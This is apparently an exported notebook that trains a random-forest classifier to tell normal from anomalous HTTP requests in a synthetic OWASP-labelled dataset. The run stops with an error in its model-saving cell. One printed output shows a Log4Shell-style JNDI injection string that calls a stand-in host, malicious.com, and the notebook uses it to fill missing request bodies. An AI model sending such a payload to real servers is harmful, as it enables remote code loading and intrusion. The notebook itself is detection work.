<span style="color:red; font-family:Helvetica Neue, Helvetica, Arial, sans-serif; font-size:2em;">An Exception was encountered at '<a href="#papermill-error-cell">In [14]</a>'.</span>

In [1]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt

In [2]:
#read data
df = pd.read_csv('/home/webhydra/web-hydra/notebooks/owasp_http_requests_100k.csv')

In [3]:
df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 100000 entries, 0 to 99999
Data columns (total 18 columns):
 #   Column           Non-Null Count   Dtype 
---  ------           --------------   ----- 
 0   Unnamed: 0       100000 non-null  object
 1   Method           100000 non-null  object
 2   User-Agent       100000 non-null  object
 3   Pragma           50190 non-null   object
 4   Cache-Control    74988 non-null   object
 5   Accept           100000 non-null  object
 6   Accept-encoding  100000 non-null  object
 7   Accept-charset   100000 non-null  object
 8   language         100000 non-null  object
 9   host             100000 non-null  object
 10  cookie           49014 non-null   object
 11  content-type     100000 non-null  object
 12  connection       100000 non-null  object
 13  lenght           100000 non-null  int64 
 14  content          34038 non-null   object
 15  classification   100000 non-null  int64 
 16  URL              100000 non-null  object
 17  owasp_categ

In [4]:
df.head()

Unnamed: 0.1,Unnamed: 0,Method,User-Agent,Pragma,Cache-Control,Accept,Accept-encoding,Accept-charset,language,host,cookie,content-type,connection,lenght,content,classification,URL,owasp_category
0,Normal,HEAD,PostmanRuntime/7.28.0,no-cache,no-store,application/json,identity,ISO-8859-1,"es-ES,es;q=0.8,en;q=0.5",evuzt.com,sid=m3frEKsY28m6FTXXWQWGuWDeuK,application/octet-stream,close,0,,0,http://evuzt.com/index.html HTTP/1.1,Normal
1,Anomalous,POST,curl/7.68.0,no-cache,max-age=0,application/json,identity,UTF-8,"fr-FR,fr;q=0.8,en;q=0.5",zgofep.local,,multipart/form-data,keep-alive,1995,data=skIrMOuEAqIrIh0VRQdzfSsgnVuG9MLqO2zNzZiBQ...,1,http://zgofep.local/submit HTTP/1.1,A09
2,Normal,POST,Mozilla/5.0 (X11; Linux x86_64) Firefox/91.0,no-cache,no-store,application/xml,identity,ISO-8859-1,"en-US,en;q=0.5",yysrhfwjve.io,sessionid=cqfu6mjIfbscylA3; csrftoken=rh5CpdSL...,multipart/form-data,close,19,phx=bro&ywhjcjp=8eg,0,http://yysrhfwjve.io/index.html/sdxx HTTP/1.1,Normal
3,Normal,GET,PostmanRuntime/7.28.0,,,*/*,"gzip, deflate",*,"fr-FR,fr;q=0.8,en;q=0.5",lwfvian.local,,application/x-www-form-urlencoded,keep-alive,0,,0,http://lwfvian.local/search?xlscv=r65&zyce=c3n...,Normal
4,Normal,GET,PostmanRuntime/7.28.0,no-cache,no-cache,application/xml,"gzip, deflate",*,"es-ES,es;q=0.8,en;q=0.5",ckxakeb.net,sid=m3frEKsY28m6FTXXWQWGuWDeuK,text/xml,close,0,,0,http://ckxakeb.net/search/swcvtuj?xadyjetp=ylj...,Normal


In [5]:
df.shape

(100000, 18)

In [6]:
#Finding missing values
df.isnull().sum()

Unnamed: 0             0
Method                 0
User-Agent             0
Pragma             49810
Cache-Control      25012
Accept                 0
Accept-encoding        0
Accept-charset         0
language               0
host                   0
cookie             50986
content-type           0
connection             0
lenght                 0
content            65962
classification         0
URL                    0
owasp_category         0
dtype: int64

In [7]:
df.drop(
    ['Unnamed: 0', 'Pragma', 'Accept-charset',
     'language', 'connection', 'Accept-encoding', 'Cache-Control' , 'owasp_category'],
    axis=1,
    inplace=True
)


In [8]:
df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 100000 entries, 0 to 99999
Data columns (total 10 columns):
 #   Column          Non-Null Count   Dtype 
---  ------          --------------   ----- 
 0   Method          100000 non-null  object
 1   User-Agent      100000 non-null  object
 2   Accept          100000 non-null  object
 3   host            100000 non-null  object
 4   cookie          49014 non-null   object
 5   content-type    100000 non-null  object
 6   lenght          100000 non-null  int64 
 7   content         34038 non-null   object
 8   classification  100000 non-null  int64 
 9   URL             100000 non-null  object
dtypes: int64(2), object(8)
memory usage: 7.6+ MB


In [9]:
for col in ['content', 'cookie']:
    if col in df.columns:
        if df[col].isnull().sum() > 0:
            df[col].fillna(df[col].mode()[0], inplace=True)
            print(f" Filled missing values in '{col}' with mode value: {df[col].mode()[0]}")
        else:
            print(f"'{col}' has no missing values.")
    else:
        print(f"'{col}' column not found in DataFrame.")

 Filled missing values in 'content' with mode value: comment=${jndi:ldap://malicious.com/a}
 Filled missing values in 'cookie' with mode value: JSESSIONID=hs4BJ8kTDguAE8hil8


The behavior will change in pandas 3.0. This inplace method will never work because the intermediate object on which we are setting values always behaves as a copy.

For example, when doing 'df[col].method(value, inplace=True)', try using 'df.method({col: value}, inplace=True)' or df[col] = df[col].method(value) instead, to perform the operation inplace on the original object.


  df[col].fillna(df[col].mode()[0], inplace=True)


In [10]:
def handle_outliers_iqr(df, cols, remove=True):
    for col in cols:
        if pd.api.types.is_numeric_dtype(df[col]):
            Q1 = df[col].quantile(0.25)
            Q3 = df[col].quantile(0.75)
            IQR = Q3 - Q1
            lower = Q1 - 1.5 * IQR
            upper = Q3 + 1.5 * IQR

            if remove:

                df = df[(df[col] >= lower) & (df[col] <= upper)]
            else:

                df[col] = df[col].clip(lower, upper)
    return df
num_cols = ['lenght']
df = handle_outliers_iqr(df, num_cols, remove=False)

In [11]:
from sklearn.preprocessing import LabelEncoder
import pandas as pd


cat_cols = df.select_dtypes(include='object').columns.tolist()


le_dict = {}
for col in cat_cols:
    le = LabelEncoder()
    df[col] = le.fit_transform(df[col].astype(str))
    le_dict[col] = le

print(f" Encoded {len(cat_cols)} categorical columns: {cat_cols}")


 Encoded 8 categorical columns: ['Method', 'User-Agent', 'Accept', 'host', 'cookie', 'content-type', 'content', 'URL']


In [12]:
from sklearn.model_selection import train_test_split

X = df.drop(columns=['classification'], errors='ignore')
y = df['classification']

X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, random_state=42, stratify=y
)

print("Data split done!")
print(f"Train shape: {X_train.shape}, Test shape: {X_test.shape}")


Data split done!
Train shape: (80000, 9), Test shape: (20000, 9)


In [13]:
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score


model = RandomForestClassifier(
    n_estimators=200, random_state=42, class_weight='balanced', n_jobs=-1
)
model.fit(X_train, y_train)


y_pred = model.predict(X_test)

print(" Model trained successfully!\n")
print(" Accuracy:", accuracy_score(y_test, y_pred))
print("\n Classification Report:\n", classification_report(y_test, y_pred))
print("\n Confusion Matrix:\n", confusion_matrix(y_test, y_pred))


 Model trained successfully!

 Accuracy: 0.9276

 Classification Report:
               precision    recall  f1-score   support

           0       0.95      0.93      0.94     12000
           1       0.89      0.93      0.91      8000

    accuracy                           0.93     20000
   macro avg       0.92      0.93      0.93     20000
weighted avg       0.93      0.93      0.93     20000


 Confusion Matrix:
 [[11119   881]
 [  567  7433]]


<span id="papermill-error-cell" style="color:red; font-family:Helvetica Neue, Helvetica, Arial, sans-serif; font-size:2em;">Execution using papermill encountered an exception here and stopped:</span>

In [14]:

# === Auto-save trained model to ml_model.joblib ===
import joblib, sys
candidates = []
for name, obj in globals().items():
    try:
        if any(hasattr(obj, a) for a in ("predict_proba","predict","decision_function")):
            candidates.append((name, type(obj).__name__))
    except Exception:
        pass

print("MODEL CANDIDATES:", candidates)

model = None
for name, obj in globals().items():
    try:
        if any(hasattr(obj, a) for a in ("predict_proba","predict","decision_function")):
            model = obj
            print("Selected model:", name, type(obj).__name__)
            break
    except Exception:
        pass

if model is None:
    raise RuntimeError("No model-like object found. Please set `model` to your trained estimator before this cell.")

joblib.dump(model, "ml_model.joblib")
print("Saved ml_model.joblib")


RuntimeError: dictionary changed size during iteration